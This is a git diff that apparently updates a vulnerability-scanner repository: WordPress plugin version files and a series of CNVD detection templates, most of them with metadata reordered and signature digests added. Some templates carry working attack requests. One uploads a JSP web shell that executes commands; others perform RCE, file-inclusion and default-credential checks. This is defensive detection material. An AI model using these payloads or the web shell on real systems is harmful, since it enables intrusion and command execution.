b/helpers/wordpress/plugins/wp-fastest-cache.txt @@ -1 +1 @@ -1.1.7 \ No newline at end of file +1.2.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-file-manager.txt b/helpers/wordpress/plugins/wp-file-manager.txt index cdf5fdc526..468c41f93c 100644 --- a/helpers/wordpress/plugins/wp-file-manager.txt +++ b/helpers/wordpress/plugins/wp-file-manager.txt @@ -1 +1 @@ -7.1.9 \ No newline at end of file +7.2.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-google-maps.txt b/helpers/wordpress/plugins/wp-google-maps.txt index ef1dc590b8..23dfb8aac2 100644 --- a/helpers/wordpress/plugins/wp-google-maps.txt +++ b/helpers/wordpress/plugins/wp-google-maps.txt @@ -1 +1 @@ -9.0.19 \ No newline at end of file +9.0.27 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-mail-smtp.txt b/helpers/wordpress/plugins/wp-mail-smtp.txt index 0be1fc7d24..b72ad011fa 100644 --- a/helpers/wordpress/plugins/wp-mail-smtp.txt +++ b/helpers/wordpress/plugins/wp-mail-smtp.txt @@ -1 +1 @@ -3.8.0 \ No newline at end of file +3.9.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-migrate-db.txt b/helpers/wordpress/plugins/wp-migrate-db.txt index ba5c9fca65..e0e1b4687c 100644 --- a/helpers/wordpress/plugins/wp-migrate-db.txt +++ b/helpers/wordpress/plugins/wp-migrate-db.txt @@ -1 +1 @@ -2.6.7 \ No newline at end of file +2.6.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-optimize.txt b/helpers/wordpress/plugins/wp-optimize.txt index 02686bc47e..b0d1f2f65f 100644 --- a/helpers/wordpress/plugins/wp-optimize.txt +++ b/helpers/wordpress/plugins/wp-optimize.txt @@ -1 +1 @@ -3.2.15 \ No newline at end of file +3.2.21 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-reset.txt b/helpers/wordpress/plugins/wp-reset.txt index 89130f4674..9288825870 100644 --- a/helpers/wordpress/plugins/wp-reset.txt +++ b/helpers/wordpress/plugins/wp-reset.txt @@ -1 +1 @@ -1.97 \ No newline at end of file +1.98 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt b/helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt new file mode 100644 index 0000000000..8709113af4 --- /dev/null +++ b/helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt @@ -0,0 +1 @@ +10.9.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-seopress.txt b/helpers/wordpress/plugins/wp-seopress.txt new file mode 100644 index 0000000000..986084f369 --- /dev/null +++ b/helpers/wordpress/plugins/wp-seopress.txt @@ -0,0 +1 @@ +7.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-smushit.txt b/helpers/wordpress/plugins/wp-smushit.txt index 7918c7abbb..c47b34584b 100644 --- a/helpers/wordpress/plugins/wp-smushit.txt +++ b/helpers/wordpress/plugins/wp-smushit.txt @@ -1 +1 @@ -3.13.1 \ No newline at end of file +3.14.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-statistics.txt b/helpers/wordpress/plugins/wp-statistics.txt index 73c5170b31..0f8f73ca84 100644 --- a/helpers/wordpress/plugins/wp-statistics.txt +++ b/helpers/wordpress/plugins/wp-statistics.txt @@ -1 +1 @@ -14.1.2 \ No newline at end of file +14.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-super-cache.txt b/helpers/wordpress/plugins/wp-super-cache.txt index 70b02ffc1b..ed21137ee1 100644 --- a/helpers/wordpress/plugins/wp-super-cache.txt +++ b/helpers/wordpress/plugins/wp-super-cache.txt @@ -1 +1 @@ -1.9.4 \ No newline at end of file +1.10.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-user-avatar.txt b/helpers/wordpress/plugins/wp-user-avatar.txt index 91f3b43844..f54e21527a 100644 --- a/helpers/wordpress/plugins/wp-user-avatar.txt +++ b/helpers/wordpress/plugins/wp-user-avatar.txt @@ -1 +1 @@ -4.11.0 \ No newline at end of file +4.13.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wpcf7-recaptcha.txt b/helpers/wordpress/plugins/wpcf7-recaptcha.txt index 3c80e4f0f2..e1df5de7ae 100644 --- a/helpers/wordpress/plugins/wpcf7-recaptcha.txt +++ b/helpers/wordpress/plugins/wpcf7-recaptcha.txt @@ -1 +1 @@ -1.4.3 \ No newline at end of file +1.4.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wpcf7-redirect.txt b/helpers/wordpress/plugins/wpcf7-redirect.txt index 6533b66871..13d683ccbf 100644 --- a/helpers/wordpress/plugins/wpcf7-redirect.txt +++ b/helpers/wordpress/plugins/wpcf7-redirect.txt @@ -1 +1 @@ -2.8.0 \ No newline at end of file +3.0.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wpforms-lite.txt b/helpers/wordpress/plugins/wpforms-lite.txt index 55d8544beb..e6995d7ff6 100644 --- a/helpers/wordpress/plugins/wpforms-lite.txt +++ b/helpers/wordpress/plugins/wpforms-lite.txt @@ -1 +1 @@ -1.8.2.2 \ No newline at end of file +1.8.4.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wps-hide-login.txt b/helpers/wordpress/plugins/wps-hide-login.txt index f5f0aa630f..c70654ddb0 100644 --- a/helpers/wordpress/plugins/wps-hide-login.txt +++ b/helpers/wordpress/plugins/wps-hide-login.txt @@ -1 +1 @@ -1.9.8 \ No newline at end of file +1.9.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wpvivid-backuprestore.txt b/helpers/wordpress/plugins/wpvivid-backuprestore.txt index 668cadeb4e..3d3a36996b 100644 --- a/helpers/wordpress/plugins/wpvivid-backuprestore.txt +++ b/helpers/wordpress/plugins/wpvivid-backuprestore.txt @@ -1 +1 @@ -0.9.87 \ No newline at end of file +0.9.92 \ No newline at end of file diff --git a/helpers/wordpress/plugins/yith-woocommerce-wishlist.txt b/helpers/wordpress/plugins/yith-woocommerce-wishlist.txt index 8912835c48..1c92f6b11a 100644 --- a/helpers/wordpress/plugins/yith-woocommerce-wishlist.txt +++ b/helpers/wordpress/plugins/yith-woocommerce-wishlist.txt @@ -1 +1 @@ -3.22.0 \ No newline at end of file +3.26.0 \ No newline at end of file diff --git a/http/cnvd/2017/CNVD-2017-03561.yaml b/http/cnvd/2017/CNVD-2017-03561.yaml index 0a443aef6e..3a943056f1 100644 --- a/http/cnvd/2017/CNVD-2017-03561.yaml +++ b/http/cnvd/2017/CNVD-2017-03561.yaml @@ -10,11 +10,10 @@ info: - https://gitee.com/cute-guy/Penetration_Testing_POC/blob/master/%E6%B3%9B%E5%BE%AEe-mobile%20ognl%E6%B3%A8%E5%85%A5.md - https://reconshell.com/vulnerability-research-list/ metadata: - max-request: 2 verified: true + max-request: 2 fofa-query: app="泛微-eMobile" tags: cnvd,cnvd2017,emobile,ognl,fanwei - variables: num1: "{{rand_int(800000, 999999)}}" num2: "{{rand_int(800000, 999999)}}" @@ -27,6 +26,7 @@ http: - "{{BaseURL}}/login/login.do?message={{num1}}*{{num2}}" stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -37,3 +37,5 @@ http: - type: status status: - 200 + +# digest: 4a0a00473045022100a19d5752bad789894eba0dddececc58caa4a618e50d1f6d2109bbac1db709c8e02201a8311d7769252d7542068a74e72d0736274f596a91ebc45fb41e219b25e5fa7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cnvd/2018/CNVD-2018-13393.yaml b/http/cnvd/2018/CNVD-2018-13393.yaml index c856e2ab8e..dd442a9889 100644 --- a/http/cnvd/2018/CNVD-2018-13393.yaml +++ b/http/cnvd/2018/CNVD-2018-13393.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-22 - tags: metinfo,cnvd,cvnd2018,lfi metadata: max-request: 1 + tags: metinfo,cnvd,cvnd2018,lfi http: - method: GET @@ -22,6 +22,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word @@ -31,4 +32,4 @@ http: - "login_met_cookie($metinfo_admin_name);" condition: and -# Enhanced by mp on 2022/07/05 +# digest: 4b0a00483046022100d93bb01defa683c44c084ad70b41b2a58596291e9193901b6f3a40b424d2eb41022100efd6e9b52905c62356c2cde1f691814d9dbada7387bceb14533a11220c27acf5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cnvd/2019/CNVD-2019-01348.yaml b/http/cnvd/2019/CNVD-2019-01348.yaml index fece77ba06..725da0f9e4 100644 --- a/http/cnvd/2019/CNVD-2019-01348.yaml +++ b/http/cnvd/2019/CNVD-2019-01348.yaml @@ -5,21 +5,22 @@ info: author: princechaddha severity: high description: The Xiuno BBS system has a system reinstallation vulnerability. The vulnerability stems from the failure to protect or filter the installation directory after the system is installed. Attackers can directly reinstall the system through the installation page. + remediation: Upgrade to the latest version of Xiuno BBS or switch to a supported product. reference: - https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 cwe-id: CWE-284 - remediation: Upgrade to the latest version of Xiuno BBS or switch to a supported product. - tags: xiuno,cnvd,cnvd2019 metadata: max-request: 1 + tags: xiuno,cnvd,cnvd2019 http: - method: GET path: - "{{BaseURL}}/install/" + headers: Accept-Encoding: deflate @@ -36,4 +37,4 @@ http: - "Choose Language (选择语言)" condition: and -# Enhanced by mp on 2022/01/26 +# digest: 4a0a00473045022100959d6311297cf34b821727b43add5b66abf2e750bbec768cca9805208a9f21d502206eb3cc0c3c4f895f712e60b98e8a360a02f92e3d7cb46cbf5d7ef7064217ab43:922c64590222798bb761d5b6d8e72950 diff --git a/http/cnvd/2019/CNVD-2019-06255.yaml b/http/cnvd/2019/CNVD-2019-06255.yaml index 154dd7940b..206ca7150a 100644 --- a/http/cnvd/2019/CNVD-2019-06255.yaml +++ b/http/cnvd/2019/CNVD-2019-06255.yaml @@ -5,17 +5,17 @@ info: author: Lark-Lab severity: critical description: CatfishCMS 4.8.54 contains a remote command execution vulnerability in the "method" parameter. + remediation: Upgrade to CatfishCMS version 4.8.54 or later. reference: - https://its401.com/article/yun2diao/91344725 - https://github.com/xwlrbh/Catfish/issues/4 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - remediation: Upgrade to CatfishCMS version 4.8.54 or later. - tags: rce,cnvd,catfishcms,cnvd2019 metadata: max-request: 1 + tags: rce,cnvd,catfishcms,cnvd2019 http: - method: GET @@ -36,4 +36,4 @@ http: - 'USER' condition: and -# Enhanced by cs on 2022/02/28 +# digest: 4a0a00473045022001f6790bc86951ffa950a8bfcc63a36b000f36b8c8c11daf9e03c936c09d84c0022100fead4a5a6ee2920ed15ab8a52ace2600ba56a0b8d888acec846dedcc8ee13908:922c64590222798bb761d5b6d8e72950 diff --git a/http/cnvd/2019/CNVD-2019-19299.yaml b/http/cnvd/2019/CNVD-2019-19299.yaml index b550840463..218a8c7517 100644 --- a/http/cnvd/2019/CNVD-2019-19299.yaml +++ b/http/cnvd/2019/CNVD-2019-19299.yaml @@ -10,11 +10,11 @@ info: - https://github.com/sectestt/CNVD-2019-19299 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - tags: zhiyuan,cnvd,cnvd2019,rce metadata: max-request: 2 + tags: zhiyuan,cnvd,cnvd2019,rce,intrusive http: - raw: @@ -39,7 +39,6 @@ http: needReadFile = yRWZdAS6 originalCreateDate IZ = 66 = = wLSGP4oEzLKAz4 <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if("x".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("{{randstr}}"))){out.println("
" +excuteCmd(request.getParameter("{{randstr}}")) + "
");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce - - | GET /seeyon/test123456.jsp?pwd=asasd3344&{{randstr}}=ipconfig HTTP/1.1 Host: {{Hostname}} @@ -53,4 +52,4 @@ http: - 'contains(body_2, "Windows IP")' condition: and -# Enhanced by mp on 2022/05/12 +# digest: 4a0a00473045022100ef3059bca86c674e0ed128cf2f938ef9da7acf1ef06803bb68411b853d7c45a40220656525ced6c91ff95ef706bc52f88acf4ab4a48cd93ac872add97d1ef70d35f1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cnvd/2019/CNVD-2019-32204.yaml b/http/cnvd/2019/CNVD-2019-32204.yaml index f9eb2ed040..6d38dac2e0 100644 --- a/http/cnvd/2019/CNVD-2019-32204.yaml +++ b/http/cnvd/2019/CNVD-2019-32204.yaml @@ -9,11 +9,11 @@ info: - https://blog.actorsfit.com/a?ID=01500-11a2f7e6-54b0-4a40-9a79-5c56dc6ebd51 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - tags: fanwei,cnvd,cnvd2019,rce metadata: max-request: 1 + tags: fanwei,cnvd,cnvd2019,rce http: - raw: @@ -29,4 +29,4 @@ http: regex: - "root:.*:0:0:" -# Enhanced by mp on 2022/05/12 +# digest: 4a0a0047304502200737b4766489cce5eaac9a1fd6d4b2456c8c259c3dc6591e5fbfe2cc53c11225022100e120e0d0a615037c438d21401935982b49b4f718cb823da8dedbd2efb34cd385:922c64590222798bb761d5b6d8e72950 diff --git a/http/cnvd/2020/CNVD-2020-23735.yaml b/http/cnvd/2020/CNVD-2020-23735.yaml index 447921267e..93f98edfc7 100644 --- a/http/cnvd/2020/CNVD-2020-23735.yaml +++ b/http/cnvd/2020/CNVD-2020-23735.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: xunchi,lfi,cnvd,cnvd2020 metadata: max-request: 1 + tags: xunchi,lfi,cnvd,cnvd2020 http: - method: GET @@ -33,4 +33,4 @@ http: - "display_errors" condition: and -# Enhanced by mp on 2022/07/22 +# digest: 4a0a00473045022034ca38e42eb10e3f993e1ec2346f3c0e8136adef3383573241671c6fc5c91e5e022100a81c4851e42aa7d04d2e7db0c381712c112273dfd1dba5c3673643e239dd5342:922c64590222798bb761d5b6d8e72950 diff --git a/http/cnvd/2020/CNVD-2020-26585.yaml b/http/cnvd/2020/CNVD-2020-26585.yaml index 71e72d80ff..264deec3d3 100644 --- a/http/cnvd/2020/CNVD-2020-26585.yaml +++ b/http/cnvd/2020/CNVD-2020-26585.yaml @@ -15,10 +15,12 @@ info: cvss-score: 9.9 cwe-id: CWE-434 metadata: - max-request: 2 verified: true + max-request: 2 fofa-query: app="ShowDoc" - tags: cnvd,cnvd2020,showdoc,fileupload + tags: cnvd,cnvd2020,showdoc,fileupload,intrusive +variables: + str1: "{{randstr}}" http: - raw: @@ -31,23 +33,18 @@ http: Content-Disposition: form-data; name="editormd-image-file"; filename="{{randstr}}.<>txt" Content-Type: text/plain - test{{randstr}} + {{str1}} ----------------------------835846770881083140190633-- - - | GET /Public//Uploads//{{date}}//{{file}} HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - - type: word - part: body - words: - - "test{{randstr}}" - - - type: status - status: - - 200 + - type: dsl + dsl: + - status_code_2 == 200 + - body_2 == str1 + condition: and extractors: - type: regex @@ -66,4 +63,4 @@ http: - '(\d{4}-\d{2}-\d{2})\\/([a-f0-9]+\.txt)' internal: true -# Enhanced by mp on 2022/05/30 +# digest: 4a0a00473045022062cd2c2372723a192107237f88061ef28ac914b37b54a0221127375e1ffce96c0221009f238b324e1dc2027171daa5c91398f44270177f799e5bef425529f795d8f979:922c64590222798bb761d5b6d8e72950 diff --git a/http/cnvd/2020/CNVD-2020-46552.yaml b/http/cnvd/2020/CNVD-2020-46552.yaml index 44402ba0b9..4fbc8f5847 100644 --- a/http/cnvd/2020/CNVD-2020-46552.yaml +++ b/http/cnvd/2020/CNVD-2020-46552.yaml @@ -11,11 +11,11 @@ info: - https://cn-sec.com/archives/721509.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - tags: cnvd,cnvd2020,sangfor,rce metadata: max-request: 1 + tags: cnvd,cnvd2020,sangfor,rce http: - method: GET @@ -31,4 +31,4 @@ http: - 'status_code == 200' condition: and -# Enhanced by mp on 2022/05/18 +# digest: 4a0a0047304502202862eba6aef622b1dae0bcb4e023f3454a7d9bafa253edded09bef38bbf64713022100e4f0118515d3ce26dfb977df1e3bb9a11401d1b113b5842311bcadea68b213bc:922c64590222798bb761d5b6d8e72950 diff --git a/http/cnvd/2020/CNVD-2020-56167.yaml b/http/cnvd/2020/CNVD-2020-56167.yaml index 0a752c7903..24c8d479d3 100644 --- a/http/cnvd/2020/CNVD-2020-56167.yaml +++ b/http/cnvd/2020/CNVD-2020-56167.yaml @@ -8,16 +8,18 @@ info: reference: - https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167 - https://securityforeveryone.com/tools/ruijie-smartweb-default-password-scanner - tags: ruijie,default-login,cnvd,cnvd2020 metadata: max-request: 1 + tags: ruijie,default-login,cnvd,cnvd2020 http: - method: POST path: - "{{BaseURL}}/WEB_VMS/LEVEL15/" + headers: Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= + body: command=show basic-info dev&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant. matchers-condition: and @@ -33,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/30 +# digest: 4b0a00483046022100ffbfb06f31d7e6fe54c37b624991573c67062006f92a636f79f757ce466c09e3022100fbeb7d9dfb087e6b5cef300abb1fbf75996d1a4f9d411f765034754db43ca62e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cnvd/2020/CNVD-2020-62422.yaml b/http/cnvd/2020/CNVD-2020-62422.yaml index c3ad3b8d73..6493d90249 100644 --- a/http/cnvd/2020/CNVD-2020-62422.yaml +++ b/http/cnvd/2020/CNVD-2020-62422.yaml @@ -7,9 +7,9 @@ info: description: Seeyon is vulnerable to local file inclusion. reference: - https://blog.csdn.net/m0_46257936/article/details/113150699 - tags: lfi,cnvd,cnvd2020,seeyon metadata: max-request: 1 + tags: lfi,cnvd,cnvd2020,seeyon http: - method: GET @@ -34,4 +34,4 @@ http: - "ctpDataSource.password" condition: and -# Enhanced by mp on 2022/07/22 +# digest: 4a0a00473045022100f6d6b777d1f13c172240d455f0c6974a9968e177069a89149ea34e55ae35ae8c0220735e63fc18f12047743e25e59dd073d45c3dda25d513bce3b8328fe44236f083:922c64590222798bb761d5b6d8e72950 diff --git a/http/cnvd/2020/CNVD-2020-63964.yaml b/http/cnvd/2020/CNVD-2020-63964.yaml index 44a87bdbb5..7ca0aa2ddb 100644 --- a/http/cnvd/2020/CNVD-2020-63964.yaml +++ b/http/cnvd/2020/CNVD-2020-63964.yaml @@ -10,8 +10,8 @@ info: - https://cn-sec.com/archives/1798444.html metadata: max-request: 1 - fofa-query: jshERP-boot shodan-query: http.favicon.hash:-1298131932 + fofa-query: jshERP-boot tags: cnvd,cnvd2022,jsherp,disclosure http: @@ -36,3 +36,5 @@ http: - type: status status: - 200 + +# digest: 490a004630440220724fbe911c6045e6bd88cdecf992f17b38734db6441c339eefba055d2bc8d2650220694911df91087bd1ae6245a7ba64036d57b000e9fb8272257b925fbd84115253:922c64590222798bb761d5b6d8e72950 diff --git a/http/cnvd/2020/CNVD-2020-67113.yaml b/http/cnvd/2020/CNVD-2020-67113.yaml index 893f3d4aac..a7ca982d30 100644 --- a/http/cnvd/2020/CNVD-2020-67113.yaml +++ b/http/cnvd/2020/CNVD-2020-67113.yaml @@ -12,8 +12,8 @@ info: cvss-score: 5.3 cwe-id: CWE-425 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.title:"H5S CONSOLE" tags: cnvd,cnvd2020,h5s,unauth,h5sconsole @@ -24,6 +24,7 @@ http: - "{{BaseURL}}/api/v1/GetDevice" stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -49,4 +50,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/06 +# digest: 4a0a004730450221009699239931e6e4becf71892aeb11692cfd9d64a3ab68b722b6ac11bd2145932b02200ebc3e717d8f7e13284940a74c6e295db280a0da787c8cb68551251918bbc153:922c64590222798bb761d5b6d8e72950 diff --git a/http/cnvd/2020/CNVD-2020-68596.yaml b/http/cnvd/2020/CNVD-2020-68596.yaml index 5a513cb50f..4f44d8c2ed 100644 --- a/http/cnvd/2020/CNVD-2020-68596.yaml +++ b/http/cnvd/2020/CNVD-2020-68596.yaml @@ -3,17 +3,17 @@ id: CNVD-2020-68596 info: name: WeiPHP 5.0 - Path Traversal author: pikpikcu - description: WeiPHP 5.0 is susceptible to directory traversal attacks. severity: high + description: WeiPHP 5.0 is susceptible to directory traversal attacks. reference: - http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-22 - tags: weiphp,lfi,cnvd,cnvd2020 metadata: max-request: 3 + tags: weiphp,lfi,cnvd,cnvd2020 http: - raw: @@ -26,8 +26,6 @@ http: - | GET /public/index.php/home/file/user_pics HTTP/1.1 Host: {{Hostname}} - - - | GET {{endpoint}} HTTP/1.1 Host: {{Hostname}} @@ -39,7 +37,6 @@ http: internal: true regex: - '/public/uploads/picture/(.*.jpg)' - matchers: - type: word part: body @@ -49,4 +46,4 @@ http: - DB_PREFIX condition: and -# Enhanced by mp on 2022/05/12 +# digest: 4a0a00473045022076ee287905eae81c2602c8abd40e89d94524b7e8a6b0aff196a895e2b7099089022100cbd7723c90ae8e44cf1b1937c2cd7ad41f67342840019cf60d8d13f6cf0c7d7f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cnvd/2021/CNVD-2021-01931.yaml b/http/cnvd/2021/CNVD-2021-01931.yaml index 50354c42fc..5f5c67e5af 100644 --- a/http/cnvd/2021/CNVD-2021-01931.yaml +++ b/http/cnvd/2021/CNVD-2021-01931.yaml @@ -7,13 +7,13 @@ info: description: The Ruoyi Management System contains a local file inclusion vulnerability that allows attackers to retrieve arbitrary files from the operating system. reference: - https://disk.scan.cm/All_wiki/%E4%BD%A9%E5%A5%87PeiQi-WIKI-POC-2021-7-20%E6%BC%8F%E6%B4%9E%E5%BA%93/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%20CNVD-2021-01931.md?hash=zE0KEPGJ - tags: ruoyi,lfi,cnvd,cnvd2021 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-22 metadata: max-request: 2 + tags: ruoyi,lfi,cnvd,cnvd2021 http: - method: GET @@ -36,4 +36,4 @@ http: - "extensions" condition: and -# Enhanced by cs on 06/03/2022 +# digest: 490a0046304402206eb36477aee26ec18695a3ec1648c797bf897241159d7fab9b8378c537d02b3902203818599485a74911d8fca2e7713c053a9318132a138daeb2628bb2e9923b2aa0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cnvd/2021/CNVD-2021-09650.yaml b/http/cnvd/2021/CNVD-2021-09650.yaml index e9969effc7..5845b025f9 100644 --- a/http/cnvd/2021/CNVD-2021-09650.yaml +++ b/http/cnvd/2021/CNVD-2021-09650.yaml @@ -11,11 +11,11 @@ info: - https://www.ruijienetworks.com classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - tags: ruijie,cnvd,cnvd2021,rce metadata: max-request: 1 + tags: ruijie,cnvd,cnvd2021,rce http: - raw: @@ -33,4 +33,4 @@ http: words: - "http" -# Enhanced by mp on 2022/05/12 +# digest: 490a0046304402204dd768957b033b40dee2801a721321fdd1bda1c8e583a63d24f583d4f9cd04b402200120cdf4837581a5b65b3f7e6de8cd8aae6ed04b5d9e09649ab6ef4e5ad3aff6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cnvd/2021/CNVD-2021-10543.yaml b/http/cnvd/2021/CNVD-2021-10543.yaml index 14c2c53131..55ae286f3c 100644 --- a/http/cnvd/2021/CNVD-2021-10543.yaml +++ b/http/cnvd/2021/CNVD-2021-10543.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-200 - tags: config,exposure,cnvd,cnvd2021 metadata: max-request: 1 + tags: config,exposure,cnvd,cnvd2021 http: - method: GET @@ -32,4 +32,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/05 +# digest: 4a0a00473045022100d379889d4aabf76f8cd7f19795af3a76697f5d146d32e431d5ee8439c72bddd60220225043edca5d64da1d85f67be59a3a8a6f8e97eda2a1cf8e2daf28caeb7758aa:922c64590222798bb761d5b6d8e72950 diff --git a/http/cnvd/2021/CNVD-2021-14536.yaml b/http/cnvd/2021/CNVD-2021-14536.yaml index 46f249aeb5..f362383dbe 100644 --- a/http/cnvd/2021/CNVD-2021-14536.yaml +++ b/http/cnvd/2021/CNVD-2021-14536.yaml @@ -43,4 +43,4 @@ http: regex: - '"role":"super_admin",(["a-z:,0-9]+),"lastpwdtime":' -# Enhanced by mp on 2022/03/28 +# digest: 490a00463044022014be2e009a3ac034a21b6eb5619a6a51d89a225044abf3ed5e8f97498172046102207ae8e44d1e976a4d11eee5d9c5c27f3126f2af24f840938aa31a246fd8296c3f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cnvd/2021/CNVD-2021-15822.yaml b/http/cnvd/2021/CNVD-2021-15822.yaml index 015c407da0..2f2def8649 100644 --- a/http/cnvd/2021/CNVD-2021-15822.yaml +++ b/http/cnvd/2021/CNVD-2021-15822.yaml @@ -9,8 +9,8 @@ info: reference: - https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"ShopXO企业级B2C电商系统提供商" fofa-query: app="ShopXO企业级B2C电商系统提供商" tags: shopxo,lfi,cnvd,cnvd2021 @@ -32,4 +32,4 @@ http: status: - 200 -# Enhanced by mp on 2022/03/17 +# digest: 4b0a00483046022100e57dac96ae0d1f36edfe893b5ac5525e60fc88fea028433abee6b60f107eaac2022100e549b69ef2d7a7b4268b8552e4990a3e588b27df60f5ea99bef5c6b6042eefbf:922c64590222798bb761d5b6d8e72950 diff --git a/http/cnvd/2021/CNVD-2021-15824.yaml b/http/cnvd/2021/CNVD-2021-15824.yaml index fd194fa6bf..07bffc67c6 100644 --- a/http/cnvd/2021/CNVD-2021-15824.yaml +++ b/http/cnvd/2021/CNVD-2021-15824.yaml @@ -13,9 +13,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: empirecms,cnvd,cnvd2021,xss,domxss metadata: max-request: 1 + tags: empirecms,cnvd,cnvd2021,xss,domxss http: - method: GET @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/03/23 +# digest: 4a0a0047304502203e06312e9eb7cfefb0336c65464fc2d81850da4cf51c2ac81d08b45a6e25ddf4022100fe267f5ff1ff112c74f78a99b9b09615d6db107d2309868b244de244bde560dc:922c64590222798bb761d5b6d8e72950 diff --git a/http/cnvd/2021/CNVD-2021-17369.yaml b/http/cnvd/2021/CNVD-2021-17369.yaml index 8f673525f2..5b6c1cc0ff 100644 --- a/http/cnvd/2021/CNVD-2021-17369.yaml +++ b/http/cnvd/2021/CNVD-2021-17369.yaml @@ -11,14 +11,15 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: ruijie,disclosure,cnvd,cnvd2021 metadata: max-request: 1 + tags: ruijie,disclosure,cnvd,cnvd2021 http: - method: GET path: - "{{BaseURL}}/web/xml/webuser-auth.xml" + headers: Cookie: login=1; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest @@ -35,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/03/16 +# digest: 